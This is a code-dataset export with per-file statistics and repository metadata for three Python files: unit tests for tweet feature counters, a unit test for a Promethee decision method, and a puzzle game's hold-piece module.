| 0
| 0
| 0.055556
| 0.055556
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a3525d2e36b057b387fd2a242a0be1258c2a7481
| 2,920
|
py
|
Python
|
test/feature_extraction/list_counter_test.py
|
tmhatton/MLinPractice
|
759706e13181cec864d6aa8ece9ae7042f083e4c
|
[
"MIT"
] | null | null | null |
test/feature_extraction/list_counter_test.py
|
tmhatton/MLinPractice
|
759706e13181cec864d6aa8ece9ae7042f083e4c
|
[
"MIT"
] | 1
|
2021-10-19T08:09:44.000Z
|
2021-10-19T08:09:44.000Z
|
test/feature_extraction/list_counter_test.py
|
tmhatton/MLinPractice
|
759706e13181cec864d6aa8ece9ae7042f083e4c
|
[
"MIT"
] | null | null | null |
import unittest
import pandas as pd
from code.feature_extraction.list_counter import PhotosNum, URLsNum, HashtagNum, MentionNum, TokenNum
from code.util import COLUMN_PHOTOS, COLUMN_URLS, COLUMN_HASHTAGS, COLUMN_MENTIONS
class PhotosNumTest(unittest.TestCase):
def setUp(self) -> None:
self.INPUT_COLUMN = COLUMN_PHOTOS
self.extractor = PhotosNum(self.INPUT_COLUMN)
def test_photos_num(self):
input_data = '''['www.hashtag.de/234234.jpg', 'www.yolo.us/g5h23g45f.png', 'www.data.it/246gkjnbvh2.jpg']'''
input_df = pd.DataFrame([COLUMN_PHOTOS])
input_df[COLUMN_PHOTOS] = [input_data]
expected_output = [3]
output = self.extractor.fit_transform(input_df)
self.assertEqual(expected_output, output)
class URLsNumTest(unittest.TestCase):
def setUp(self) -> None:
self.INPUT_COLUMN = COLUMN_URLS
self.extractor = URLsNum(self.INPUT_COLUMN)
def test_url_num(self):
input_data = '''['www.google.com', 'www.apple.com', 'www.uos.de', 'www.example.com']'''
input_df = pd.DataFrame([COLUMN_URLS])
input_df[COLUMN_URLS] = [input_data]
expected_output = [4]
output = self.extractor.fit_transform(input_df)
self.assertEqual(expected_output, output)
class HashtagNumTest(unittest.TestCase):
def setUp(self) -> None:
self.INPUT_COLUMN = COLUMN_HASHTAGS
self.extractor = HashtagNum(self.INPUT_COLUMN)
def test_hashtag_num(self):
input_data = '''['hashtag', 'yolo', 'data']'''
input_df = pd.DataFrame([COLUMN_HASHTAGS])
input_df[COLUMN_HASHTAGS] = [input_data]
expected_output = [3]
output = self.extractor.fit_transform(input_df)
self.assertEqual(expected_output, output)
class MentionNumTest(unittest.TestCase):
def setUp(self) -> None:
self.INPUT_COLUMN = COLUMN_MENTIONS
self.extractor = MentionNum(self.INPUT_COLUMN)
def test_mention_num(self):
input_data = '''[{'id': '2235729541', 'name': 'dogecoin', 'screen_name': 'dogecoin'}, {'id': '123432342', 'name': 'John Doe', 'screen_name': 'jodoe'}]'''
input_df = pd.DataFrame([COLUMN_MENTIONS])
input_df[COLUMN_MENTIONS] = [input_data]
expected_output = [2]
output = self.extractor.fit_transform(input_df)
self.assertEqual(expected_output, output)
class TokenNumTest(unittest.TestCase):
def setUp(self) -> None:
self.INPUT_COLUMN = "input"
self.extractor = TokenNum(self.INPUT_COLUMN)
def test_token_length(self):
input_text = "['This', 'is', 'an', 'example', 'sentence']"
output = [5]
input_df = pd.DataFrame()
input_df[self.INPUT_COLUMN] = [input_text]
token_length = self.extractor.fit_transform(input_df)
self.assertEqual(output, token_length)
if __name__ == '__main__':
unittest.main()
| 30.736842
| 161
| 0.667466
| 348
| 2,920
| 5.344828
| 0.244253
| 0.077419
| 0.08871
| 0.064516
| 0.489247
| 0.358065
| 0.358065
| 0.358065
| 0.332796
| 0.307527
| 0
| 0.016818
| 0.205822
| 2,920
| 94
| 162
| 31.06383
| 0.785252
| 0
| 0
| 0.245902
| 0
| 0.04918
| 0.128082
| 0.029795
| 0
| 0
| 0
| 0
| 0.081967
| 1
| 0.163934
| false
| 0
| 0.065574
| 0
| 0.311475
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a352f55dcd4b6a9dcf2653a39663d590b4d79e27
| 926
|
py
|
Python
|
tests/test_2_promethee.py
|
qanastek/EasyMCDM
|
7fa2e2dfe9397834ca9f50211ea2717a16785394
|
[
"MIT"
] | 4
|
2022-03-05T20:51:38.000Z
|
2022-03-15T17:10:22.000Z
|
tests/test_2_promethee.py
|
qanastek/EasyMCDM
|
7fa2e2dfe9397834ca9f50211ea2717a16785394
|
[
"MIT"
] | null | null | null |
tests/test_2_promethee.py
|
qanastek/EasyMCDM
|
7fa2e2dfe9397834ca9f50211ea2717a16785394
|
[
"MIT"
] | 1
|
2022-03-08T13:45:22.000Z
|
2022-03-08T13:45:22.000Z
|
import unittest
from operator import index
from EasyMCDM.models.Promethee import Promethee
class TestPrometheeMethods(unittest.TestCase):
def test_str_str_str(self):
d = "data/partiels_donnees.csv"
p = Promethee(data=d, verbose=False)
res = p.solve(
weights=[0.3, 0.2, 0.2, 0.1, 0.2],
prefs=["min","min","max","max","max"]
)
assert res["phi_negative"] == [('A', 0.8), ('C', 1.4000000000000001), ('D', 1.7), ('E', 2.4), ('B', 3.0999999999999996)], "Phi Negative are differents!"
assert res["phi_positive"] == [('A', 3.0), ('C', 2.2), ('D', 1.9), ('E', 1.4000000000000001), ('B', 0.9)], "Phi positive are differents!"
assert res["phi"] == [('A', 2.2), ('C', 0.8), ('D', 0.19999999999999996), ('E', -0.9999999999999998), ('B', -2.1999999999999997)], "Phi are differents!"
if __name__ == '__main__':
unittest.main()
| 42.090909
| 161
| 0.565875
| 125
| 926
| 4.08
| 0.44
| 0.011765
| 0.070588
| 0.086275
| 0.098039
| 0
| 0
| 0
| 0
| 0
| 0
| 0.180441
| 0.215983
| 926
| 22
| 162
| 42.090909
| 0.522039
| 0
| 0
| 0
| 0
| 0
| 0.182119
| 0.027594
| 0
| 0
| 0
| 0
| 0.1875
| 1
| 0.0625
| false
| 0
| 0.1875
| 0
| 0.3125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a3552615d55b8131f79fc858dd41da8c30cf2d71
| 6,028
|
py
|
Python
|
Source/game/systems/puzzle/hold.py
|
LucXyMan/starseeker
|
b5c3365514c982734da7d95621e6b85af550ce82
|
[
"BSD-3-Clause"
] | null | null | null |
Source/game/systems/puzzle/hold.py
|
LucXyMan/starseeker
|
b5c3365514c982734da7d95621e6b85af550ce82
|
[
"BSD-3-Clause"
] | null | null | null |
Source/game/systems/puzzle/hold.py
|
LucXyMan/starseeker
|
b5c3365514c982734da7d95621e6b85af550ce82
|
[
"BSD-3-Clause"
] | 1
|
2019-11-27T18:00:00.000Z
|
2019-11-27T18:00:00.000Z
|
#!/usr/bin/env python2.7
# -*- coding:UTF-8 -*-2
u"""hold.py
Copyright (c) 2019 Yukio Kuro
This software is released under BSD license.
ホールドピース管理モジュール。
"""
import pieces as _pieces
import utils.const as _const
import utils.layouter as _layouter
class Hold(object):
u"""ホールドピース管理。
"""
__slots__ = (
"__id", "__item_state", "__is_captured", "__keep", "__piece",
"__system", "__window")
__GOOD_ITEM_NAMES = (
_const.STAR_NAMES+"#"+_const.SHARD_NAMES+"#" +
_const.KEY_NAMES+"#"+_const.CHEST_NAMES+"#Maxwell")
__BAD_ITEM_NAMES = (
_const.IRREGULAR_NAMES+"#"+_const.DEMON_NAMES+"#" +
_const.GHOST_NAMES+"#Pandora#Joker")
def __init__(self, system):
u"""コンストラクタ。
self.__id: オブジェクトの位置決定に使用。
self.__keep: ホールドピースパターンを保持。
"""
import pygame as __pygame
import window as __window
self.__system = system
self.__id = self.__system.id
self.__piece = None
self.__keep = _pieces.Array(length=2)
self.__window = __window.Next(__pygame.Rect(
(0, 0), _const.NEXT_WINDOW_SIZE))
self.__is_captured = False
self.__item_state = 0b0000
self.__window.is_light = not self.__is_captured
_layouter.Game.set_hold(self.__window, self.__id)
def __display(self):
u"""ピース表示。
"""
self.__piece = _pieces.Falling(self.__keep[0], (0, 0))
self.__window.piece = self.__piece
def __set_item_state(self):
u"""パターン内部のアイテムによって値を設定。
0b0001: ホールドブロックが存在する。
0b0010: 基本ブロックが存在する。
0b0100: 良性アイテムが存在する。
0b1000: 悪性アイテムが存在する。
"""
pattern, = self.__keep
self.__item_state = (
0b0001+(any(any(
shape and shape.type in _const.BASIC_NAMES.split("#") for
shape in line) for line in pattern) << 1) +
(any(any(
shape and shape.type in self.__GOOD_ITEM_NAMES.split("#") for
shape in line) for line in pattern) << 2) +
(any(any(
shape and shape.type in self.__BAD_ITEM_NAMES.split("#") for
shape in line) for line in pattern) << 3))
def change(self, is_single, target):
u"""ブロック変化。
"""
if not self.__keep.is_empty:
new, old = target.split("##")
self.__piece.clear()
if self.__system.battle.player.armor.is_prevention(new):
_, _, armor, _ = self.__system.battle.equip_huds
armor.flash()
elif not self.__system.battle.group.is_prevention(new):
pattern, = self.__keep
if is_single:
pattern.append(new, old)
else:
pattern.change(new, old)
self.__set_item_state()
self.__display()
def capture(self):
u"""ピースの取得・交換。
"""
import material.sound as __sound
def __accessory_effect():
u"""装飾品効果。
"""
battle = self.__system.battle
effect = battle.player.accessory.spell
if effect:
is_single, new, old = effect
_, _, armor, accessory = battle.equip_huds
if battle.player.armor.is_prevention(new):
armor.flash()
elif not battle.group.is_prevention(new) and (
self.__keep[-1].append(new, old) if is_single else
self.__keep[-1].change(new, old)
):
accessory.flash()
def __update():
u"""パラメータ更新。
"""
self.is_captured = True
self.__set_item_state()
self.__display()
if not self.__is_captured:
__sound.SE.play("hold")
puzzle = self.__system.puzzle
if self.__keep.is_empty:
puzzle.piece.pattern.rotate(0)
self.__keep.append(puzzle.piece.pattern)
__accessory_effect()
puzzle.piece.clear()
puzzle.forward()
__update()
else:
virtual = self.virtual
virtual.topleft = puzzle.piece.state.topleft
if not virtual.is_collide(puzzle.field):
self.__piece.clear()
puzzle.piece.clear()
puzzle.piece.pattern.rotate(0)
self.__keep.append(puzzle.piece.pattern)
__accessory_effect()
puzzle.piece.pattern = self.__keep.pop()
puzzle.update()
__update()
def exchange(self, other):
u"""ピース交換。
"""
if not self.__keep.is_empty and not other.__keep.is_empty:
self.__piece.clear()
other.__piece.clear()
pattern, = self.__keep
other_pattern, = other.__keep
self.__keep[0] = other_pattern
other.__keep[0] = pattern
self.__set_item_state()
other.__set_item_state()
self.__display()
other.__display()
@property
def virtual(self):
u"""計算用ピース取得。
"""
if not self.__keep.is_empty:
pattern, = self.__keep
return _pieces.Falling(pattern, is_virtual=True)
@property
def is_empty(self):
u"""空判定。
"""
return self.__keep.is_empty
@property
def is_captured(self):
u"""キャプチャ判定。
"""
return self.__is_captured
@is_captured.setter
def is_captured(self, value):
u"""キャプチャ設定。
ウィンドウの色付けも設定。
"""
self.__is_captured = value
self.__window.is_light = not self.__is_captured
@property
def item_state(self):
u"""アイテム状態取得。
"""
return self.__item_state
@property
def window(self):
u"""ウィンドウ取得。
"""
return self.__window
| 31.233161
| 77
| 0.535169
| 637
| 6,028
| 4.638933
| 0.246468
| 0.048731
| 0.033164
| 0.025381
| 0.239594
| 0.214213
| 0.175635
| 0.142132
| 0.099492
| 0.099492
| 0
| 0.013656
| 0.356171
| 6,028
| 192
| 78
| 31.395833
| 0.747488
| 0.092236
| 0
| 0.260274
| 0
| 0
| 0.017716
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.09589
| false
| 0
| 0.041096
| 0
| 0.19863
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|